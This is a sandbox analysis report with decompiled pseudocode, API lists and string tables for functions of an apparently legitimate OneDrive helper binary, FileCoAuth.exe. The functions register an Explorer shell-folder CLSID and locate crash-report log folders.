    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Closewcscat_s$InfoQuerywcscpy_s$CreateFromInstanceString
    • String ID: CLSID\$\Implemented Categories$\Required Categories
    • API String ID: 1945653186-4092563799
    • Opcode ID: ee46fe441359051f47bf3ee32a53d727e18ca23ccd549d8ddbafa05c6d622d8a
    • Instruction ID: ceef259d9adcfe02b7ca737f66971cc5497ab2f303da7b7a504173c31a35f7ac
    • Opcode Fuzzy Hash: ee46fe441359051f47bf3ee32a53d727e18ca23ccd549d8ddbafa05c6d622d8a
    • Instruction Fuzzy Hash: 0F915171A01229AFDF25DF54CC91BEAB7B9BF4A344F0041E9EA49B7150D730AE848F91
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 99%
    			E00EA1C98(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t193;
    				void* _t309;
    				void* _t313;
    				intOrPtr _t328;
    				void* _t330;
    
    				_t313 = __edx;
    				_push(0x88);
    				E00EA3194(E00EA560B, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t330 - 0x8c)) =  *((intOrPtr*)(_t330 + 8));
    				 *((intOrPtr*)(_t330 - 0x94)) =  *((intOrPtr*)(_t330 + 0x1c));
    				E00E94E9D(_t330 - 0x70, L"Software\\Classes\\CLSID\\");
    				 *(_t330 - 4) = 0;
    				E00E95904(_t330 - 0x70,  *((intOrPtr*)(_t330 + 0xc)), 0, 0xffffffff);
    				E00E94E9D(_t330 - 0x28, 0xea7340);
    				 *(_t330 - 4) = 1;
    				_t259 =  *((intOrPtr*)(_t330 + 0x20));
    				_t324 = E00E9F5DC(0x80000001, _t330 - 0x70, _t330 - 0x28,  *((intOrPtr*)(_t330 + 0x10)),  *((intOrPtr*)(_t330 + 0x20)), 0);
    				 *(_t330 - 4) = 0;
    				E00E94307(_t330 - 0x28, 1, 0);
    				if(_t158 >= 0) {
    					 *((intOrPtr*)(_t330 - 0x90)) = 1;
    					E00E94E9D(_t330 - 0x28, L"System.IsPinnedToNameSpaceTree");
    					 *(_t330 - 4) = 2;
    					_t324 = E00E9F559(0x80000001, _t330 - 0x70, _t330 - 0x28, _t330 - 0x90, _t259);
    					 *(_t330 - 4) = 0;
    					E00E94307(_t330 - 0x28, 1, 0);
    					if(_t167 >= 0) {
    						 *((intOrPtr*)(_t330 - 0x90)) = 0x42;
    						E00E94E9D(_t330 - 0x28, L"SortOrderIndex");
    						 *(_t330 - 4) = 3;
    						_t324 = E00E9F559(0x80000001, _t330 - 0x70, _t330 - 0x28, _t330 - 0x90, _t259);
    						 *(_t330 - 4) = 0;
    						E00E94307(_t330 - 0x28, 1, 0);
    						_t334 = _t324;
    						if(_t324 >= 0) {
    							E00E9A1D7(_t330 - 0x28, _t330 - 0x70);
    							 *(_t330 - 4) = 4;
    							_t325 = L"\\InProcServer32";
    							E00E98198(_t330 - 0x28, _t334, _t325, E00E94E74(L"\\InProcServer32"));
    							E00E94E9D(_t330 - 0x40, L"%systemroot%\\system32\\shell32.dll");
    							 *(_t330 - 4) = 5;
    							E00E94E9D(_t330 - 0x58, 0xea7340);
    							 *(_t330 - 4) = 6;
    							_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x58, _t330 - 0x40, _t259, 1);
    							 *(_t330 - 4) = 5;
    							E00E94307(_t330 - 0x58, 1, 0);
    							 *(_t330 - 4) = 4;
    							E00E94307(_t330 - 0x40, 1, 0);
    							 *(_t330 - 4) = 0;
    							E00E94307(_t330 - 0x28, 1, 0);
    							if(_t324 >= 0) {
    								E00E94E9D(_t330 - 0x58, _t193);
    								 *(_t330 - 4) = 9;
    								E00E94E9D(_t330 - 0x40, 0xea7340);
    								 *(_t330 - 4) = 0xa;
    								_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x58, _t259, 0);
    								 *(_t330 - 4) = 9;
    								E00E94307(_t330 - 0x40, 1, 0);
    								 *(_t330 - 4) = 8;
    								E00E94307(_t330 - 0x58, 1, 0);
    								 *(_t330 - 4) = 7;
    								E00E94307(_t330 - 0x88, 1, 0);
    								 *(_t330 - 4) = 0;
    								E00E94307(_t330 - 0x28, 1, 0);
    								_t337 = _t324;
    								if(_t324 >= 0) {
    									E00E9A1D7(_t330 - 0x28, _t330 - 0x70);
    									 *(_t330 - 4) = 0xb;
    									_t327 = L"\\Instance";
    									E00E98198(_t330 - 0x28, _t337, _t327, E00E94E74(L"\\Instance"));
    									E00E94E9D(_t330 - 0x58, L"{0E5AAE11-A475-4c5b-AB00-C66DE400274E}");
    									 *(_t330 - 4) = 0xc;
    									E00E94E9D(_t330 - 0x40, L"CLSID");
    									 *(_t330 - 4) = 0xd;
    									_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x58, _t259, 0);
    									 *(_t330 - 4) = 0xc;
    									E00E94307(_t330 - 0x40, 1, 0);
    									 *(_t330 - 4) = 0xb;
    									E00E94307(_t330 - 0x58, 1, 0);
    									 *(_t330 - 4) = 0;
    									E00E94307(_t330 - 0x28, 1, 0);
    									_t338 = _t324;
    									if(_t324 >= 0) {
    										E00E9A1D7(_t330 - 0x28, _t330 - 0x70);
    										 *(_t330 - 4) = 0xe;
    										_t328 =  *0xeb0078; // 0xea6fb0
    										E00E98198(_t330 - 0x28, _t338, _t328, E00E94E74(_t328));
    										 *((intOrPtr*)(_t330 - 0x94)) = 0x11;
    										E00E94E9D(_t330 - 0x40, L"Attributes");
    										 *(_t330 - 4) = 0xf;
    										_t324 = E00E9F559(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x94, _t259);
    										 *(_t330 - 4) = 0xe;
    										E00E94307(_t330 - 0x40, 1, 0);
    										if(_t324 >= 0) {
    											if( *((char*)(_t330 + 0x14)) == 0 ||  *((char*)(_t330 + 0x18)) != 0) {
    												E00E94E9D(_t330 - 0x40,  *0xeb0080);
    												 *(_t330 - 4) = 0x12;
    												_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x40,  *((intOrPtr*)(_t330 - 0x8c)), _t259, 0);
    												 *(_t330 - 4) = 0xe;
    												_t309 = _t330 - 0x40;
    											} else {
    												E00E94E9D(_t330 - 0x58, L"{a52bba46-e9e1-435f-b3d9-28daa648c0f6}");
    												 *(_t330 - 4) = 0x10;
    												E00E94E9D(_t330 - 0x40,  *0xeb0084);
    												 *(_t330 - 4) = 0x11;
    												_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x58, _t259, 0);
    												 *(_t330 - 4) = 0x10;
    												E00E94307(_t330 - 0x40, 1, 0);
    												 *(_t330 - 4) = 0xe;
    												_t309 = _t330 - 0x58;
    											}
    											E00E94307(_t309, 1, 0);
    										}
    										 *(_t330 - 4) = 0;
    										E00E94307(_t330 - 0x28, 1, 0);
    										_t342 = _t324;
    										if(_t324 >= 0) {
    											E00E9A1D7(_t330 - 0x28, _t330 - 0x70);
    											 *(_t330 - 4) = 0x13;
    											_t329 = L"\\ShellFolder";
    											E00E98198(_t330 - 0x28, _t342, _t329, E00E94E74(L"\\ShellFolder"));
    											 *((intOrPtr*)(_t330 - 0x8c)) = 0x28;
    											E00E94E9D(_t330 - 0x40, L"FolderValueFlags");
    											 *(_t330 - 4) = 0x14;
    											_t324 = E00E9F559(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x8c, _t259);
    											 *(_t330 - 4) = 0x13;
    											E00E94307(_t330 - 0x40, 1, 0);
    											if(_t236 >= 0) {
    												 *((intOrPtr*)(_t330 - 0x8c)) = 0xf080004d;
    												E00E94E9D(_t330 - 0x40, L"Attributes");
    												 *(_t330 - 4) = 0x15;
    												_t324 = E00E9F559(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x8c, _t259);
    												 *(_t330 - 4) = 0x13;
    												E00E94307(_t330 - 0x40, 1, 0);
    											}
    											 *(_t330 - 4) = 0;
    											E00E94307(_t330 - 0x28, 1, 0);
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				 *(_t330 - 4) =  *(_t330 - 4) | 0xffffffff;
    				E00E94307(_t330 - 0x70, 1, 0);
    				return E00EA3152(_t259, 0, _t324);
    			}

    Address range covered by the listing: 0x00ea1c98 - 0x00ea21bd

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA1CA2
      • Part of subcall function 00E95904: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95920
      • Part of subcall function 00E95904: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95944
      • Part of subcall function 00E9F5DC: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00E9F60F
      • Part of subcall function 00E9F5DC: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000008,?), ref: 00E9F655
      • Part of subcall function 00E9F5DC: RegCloseKey.ADVAPI32(00000000), ref: 00E9F660
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
      • Part of subcall function 00E9F559: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00E9F58C
      • Part of subcall function 00E9F559: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,00000008,00000004), ref: 00E9F5B8
      • Part of subcall function 00E9F559: RegCloseKey.ADVAPI32(00000000), ref: 00E9F5C3
      • Part of subcall function 00E98198: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,Last known error: ,?,?,00E9828C,Last known error: ,00000000,00000000,?,00E983E9), ref: 00E981E1
      • Part of subcall function 00EA16B7: __EH_prolog3_GS.LIBCMT ref: 00EA16BE
      • Part of subcall function 00EA16B7: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000038,00EA254A,?,?,00000001,00000001,00000000,00EA7340,00EA6EA4,00000000,?,00000000), ref: 00EA170F
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CloseCreateH_prolog3_ValueXlength_error@std@@$??3@EnvironmentExpandStringsXout_of_range@std@@
    • String ID: %systemroot%\system32\shell32.dll$Attributes$B$CLSID$FolderValueFlags$M$Software\Classes\CLSID\$SortOrderIndex$System.IsPinnedToNameSpaceTree$\InProcServer32$\Instance$\ShellFolder${0E5AAE11-A475-4c5b-AB00-C66DE400274E}${a52bba46-e9e1-435f-b3d9-28daa648c0f6}
    • API String ID: 2726614150-2117654554
    • Opcode ID: 6f89528ee113cba5713611df410a4c3006ca0a6c0f92624a047112a1e0fb162b
    • Instruction ID: 3d97c9820fe9d2a2d7cc52cea41d1dcccd0cacb31a477015f12d627b58e72fbc
    • Opcode Fuzzy Hash: 6f89528ee113cba5713611df410a4c3006ca0a6c0f92624a047112a1e0fb162b
    • Instruction Fuzzy Hash: F5F13EB2801298EEDF11DBE4CC45FDEBBB8AB19304F041199F645BB182DB706A49CB71
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 57%
    			E00E9A537(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t22;
    				void* _t29;
    				void* _t67;
    				void* _t70;
    
    				E00EA3194(E00EA3E17, __ebx, __edi, __esi);
    				_t67 = __ecx;
    				 *((intOrPtr*)(_t70 - 0x21c)) = 0;
    				_t22 = E00E9851B(_t70 - 0x21c, "WatsonReport::GetSyncEngineLogLocation");
    				 *((intOrPtr*)(_t70 - 4)) = 0;
    				E00E982B9(_t70 - 0x21c);
    				_t69 = 0x80004005;
    				 *((short*)(_t70 - 0x218)) = 0;
    				memset(_t70 - 0x216, 0, 0x206);
    				_t29 = _t70 - 0x218;
    				__imp__SHGetSpecialFolderPathW(0, _t29, 0x1c, 0, (_t22 & 0xffffff00 | __ecx != 0x00000000) & 0x000000ff, L"d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\watsonreport.cpp", 0x102, L"WatsonReport::GetSyncEngineLogLocation", L"(pSyncEngineLogPath != NULL)", L"Expected non-NULL sync engine log location", 0x2c4);
    				_t76 = _t29 - 1;
    				if(_t29 == 1) {
    					memset(_t70 - 0x2b8, 0, 0x98);
    					E00E97773(0, _t70 - 0x2b8, _t67, 0x80004005, _t76);
    					 *((char*)(_t70 - 4)) = 1;
    					_t56 =  >=  ?  *0xeb1a44 : 0xeb1a44;
    					_t78 =  *0xeb1b00 - 8;
    					_t37 =  >=  ?  *0xeb1aec : 0xeb1aec;
    					E00E97EF0(0, _t67, _t69, _t78);
    					E00E990AD(_t67, E00E9817A(_t70 - 0x2b8, _t70 - 0x2d0));
    					E00E94307(_t70 - 0x2d0, 1, 0);
    					_t69 = 0;
    					E00E97DF8();
    					__imp__??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ(E00E99D69(0, E00E97EF0(0, _t67, _t69,  *0xeb1b00 - 8), _t67, _t69, _t78), E00E99D69(0, E00E97EF0(0, _t67, 0x80004005,  *0xeb1b00 - 8), _t67, 0x80004005,  *0xeb1b00 - 8), _t70 - 0x2b8, _t70 - 0x218,  >=  ?  *0xeb1a44 : 0xeb1a44,  >=  ?  *0xeb1aec : 0xeb1aec, 0xeb1a44, 0xeb1a44, 2, 1);
    				}
    				E00E98588();
    				return E00EA3152(0, _t67, _t69);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9A541
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BD336131,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E9A5A5
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,00E991C2,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000), ref: 00E9A5B8
    • memset.MSVCR120 ref: 00E9A5D4
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
      • Part of subcall function 00E99D69: __EH_prolog3_catch.LIBCMT ref: 00E99D70
      • Part of subcall function 00E99D69: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99F75
      • Part of subcall function 00E97EF0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,00000000,00000024,00E98351,?,?), ref: 00E97FA2
      • Part of subcall function 00E97EF0: ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z.MSVCP120(00000000,?,00000000,00000000,00000024,00E98351,?,?), ref: 00E97FD3
      • Part of subcall function 00E97EF0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?), ref: 00E98001
      • Part of subcall function 00E99D69: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP120(?,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99DFB
      • Part of subcall function 00E99D69: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99E4E
      • Part of subcall function 00E99D69: ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP120(00EA8DB8,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99E96
      • Part of subcall function 00E99D69: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99EA3
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(00000001,00000000,00000000,?,00000000,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E9A683
    Strings
    • *.log, xrefs: 00E9A5EF, 00E9A60E, 00E9A616, 00E9A618
    • Expected non-NULL sync engine log location, xrefs: 00E9A560
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp, xrefs: 00E9A57F
    • (pSyncEngineLogPath != NULL), xrefs: 00E9A565
    • WatsonReport::GetSyncEngineLogLocation, xrefs: 00E9A550
    • WatsonReport::GetSyncEngineLogLocation, xrefs: 00E9A56A
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$?sputc@?$basic_streambuf@_memset$?setstate@?$basic_ios@_H_prolog3_catch$??0?$basic_ios@_??0?$basic_ostream@_??1?$basic_ios@_??3@?getloc@ios_base@std@@?sputn@?$basic_streambuf@_?widen@?$ctype@_ErrorFolderH_prolog3H_prolog3_LastPathSpecialV?$basic_streambuf@_Vlocale@2@W@std@@W@std@@@1@__vsnwprintf
    • String ID: (pSyncEngineLogPath != NULL)$*.log$Expected non-NULL sync engine log location$WatsonReport::GetSyncEngineLogLocation$WatsonReport::GetSyncEngineLogLocation$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp
    • API String ID: 294834291-2328995104
    • Opcode ID: a4d65a63215b8704c924b1fccf69d5cd27cb3dc7f19344b5c7b37c1aedc52f14
    • Instruction ID: 352b1a192f6bee0a94f7c0d6fda261d5d2d7075bb0f5f194fad4de5ff4edf98f
    • Opcode Fuzzy Hash: a4d65a63215b8704c924b1fccf69d5cd27cb3dc7f19344b5c7b37c1aedc52f14
    • Instruction Fuzzy Hash: 4831C471A50308AEDF10EB70CC9AEEE73AD9B25300F001199B005B6092DE74AF89CB50
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 57%
    			E00E9A537(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t22;
    				void* _t29;
    				void* _t67;
    				void* _t70;
    
    				E00EA3194(E00EA3E17, __ebx, __edi, __esi);
    				_t67 = __ecx;
    				 *((intOrPtr*)(_t70 - 0x21c)) = 0;
    				_t22 = E00E9851B(_t70 - 0x21c, "WatsonReport::GetSyncEngineLogLocation");
    				 *((intOrPtr*)(_t70 - 4)) = 0;
    				E00E982B9(_t70 - 0x21c);
    				_t69 = 0x80004005;
    				 *((short*)(_t70 - 0x218)) = 0;
    				memset(_t70 - 0x216, 0, 0x206);
    				_t29 = _t70 - 0x218;
    				__imp__SHGetSpecialFolderPathW(0, _t29, 0x1c, 0, (_t22 & 0xffffff00 | __ecx != 0x00000000) & 0x000000ff, L"d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\watsonreport.cpp", 0x102, L"WatsonReport::GetSyncEngineLogLocation", L"(pSyncEngineLogPath != NULL)", L"Expected non-NULL sync engine log location", 0x2c4);
    				_t76 = _t29 - 1;
    				if(_t29 == 1) {
    					memset(_t70 - 0x2b8, 0, 0x98);
    					E00E97773(0, _t70 - 0x2b8, _t67, 0x80004005, _t76);
    					 *((char*)(_t70 - 4)) = 1;
    					_t56 =  >=  ?  *0xeb1a44 : 0xeb1a44;
    					_t78 =  *0xeb1b00 - 8;
    					_t37 =  >=  ?  *0xeb1aec : 0xeb1aec;
    					E00E97EF0(0, _t67, _t69, _t78);
    					E00E990AD(_t67, E00E9817A(_t70 - 0x2b8, _t70 - 0x2d0));
    					E00E94307(_t70 - 0x2d0, 1, 0);
    					_t69 = 0;
    					E00E97DF8();
    					__imp__??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ(E00E99D69(0, E00E97EF0(0, _t67, _t69,  *0xeb1b00 - 8), _t67, _t69, _t78), E00E99D69(0, E00E97EF0(0, _t67, 0x80004005,  *0xeb1b00 - 8), _t67, 0x80004005,  *0xeb1b00 - 8), _t70 - 0x2b8, _t70 - 0x218,  >=  ?  *0xeb1a44 : 0xeb1a44,  >=  ?  *0xeb1aec : 0xeb1aec, 0xeb1a44, 0xeb1a44, 2, 1);
    				}
    				E00E98588();
    				return E00EA3152(0, _t67, _t69);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9A541
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BB40E64E,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E9A5A5
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,00E991C2,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000), ref: 00E9A5B8
    • memset.MSVCR120 ref: 00E9A5D4
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
      • Part of subcall function 00E99D69: __EH_prolog3_catch.LIBCMT ref: 00E99D70
      • Part of subcall function 00E99D69: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99F75
      • Part of subcall function 00E97EF0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,00000000,00000024,00E98351,?,?), ref: 00E97FA2
      • Part of subcall function 00E97EF0: ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z.MSVCP120(00000000,?,00000000,00000000,00000024,00E98351,?,?), ref: 00E97FD3
      • Part of subcall function 00E97EF0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?), ref: 00E98001
      • Part of subcall function 00E99D69: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99DFB
      • Part of subcall function 00E99D69: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99E4E
      • Part of subcall function 00E99D69: ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP120(00EA8DB8,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99E96
      • Part of subcall function 00E99D69: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99EA3
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(00000001,00000000,00000000,?,00000000,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A683
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp, xrefs: 00E9A57F
    • WatsonReport::GetSyncEngineLogLocation, xrefs: 00E9A56A
    • Expected non-NULL sync engine log location, xrefs: 00E9A560
    • WatsonReport::GetSyncEngineLogLocation, xrefs: 00E9A550
    • (pSyncEngineLogPath != NULL), xrefs: 00E9A565
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$?sputc@?$basic_streambuf@_memset$?setstate@?$basic_ios@_H_prolog3_catch$??0?$basic_ios@_??0?$basic_ostream@_??1?$basic_ios@_??3@?getloc@ios_base@std@@?sputn@?$basic_streambuf@_?widen@?$ctype@_ErrorFolderH_prolog3H_prolog3_LastPathSpecialV?$basic_streambuf@_Vlocale@2@W@std@@W@std@@@1@__vsnwprintf
    • String ID: (pSyncEngineLogPath != NULL)$Expected non-NULL sync engine log location$WatsonReport::GetSyncEngineLogLocation$WatsonReport::GetSyncEngineLogLocation$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp
    • API String ID: 294834291-2325178540
    • Opcode ID: a4d65a63215b8704c924b1fccf69d5cd27cb3dc7f19344b5c7b37c1aedc52f14
    • Instruction ID: 352b1a192f6bee0a94f7c0d6fda261d5d2d7075bb0f5f194fad4de5ff4edf98f
    • Opcode Fuzzy Hash: a4d65a63215b8704c924b1fccf69d5cd27cb3dc7f19344b5c7b37c1aedc52f14
    • Instruction Fuzzy Hash: 4831C471A50308AEDF10EB70CC9AEEE73AD9B25300F001199B005B6092DE74AF89CB50
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 51%
    			E00E9A69C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t22;
    				void* _t29;
    				void* _t50;
    				void* _t59;
    				void* _t62;
    
    				E00EA3194(E00EA3E17, __ebx, __edi, __esi);
    				_t59 = __ecx;
    				 *((intOrPtr*)(_t62 - 0x21c)) = 0;
    				_t22 = E00E9851B(_t62 - 0x21c, "WatsonReport::GetSetupLogsLocation");
    				 *((intOrPtr*)(_t62 - 4)) = 0;
    				E00E982B9(_t62 - 0x21c);
    				_t61 = 0x80004005;
    				 *((short*)(_t62 - 0x218)) = 0;
    				memset(_t62 - 0x216, 0, 0x206);
    				_t29 = _t62 - 0x218;
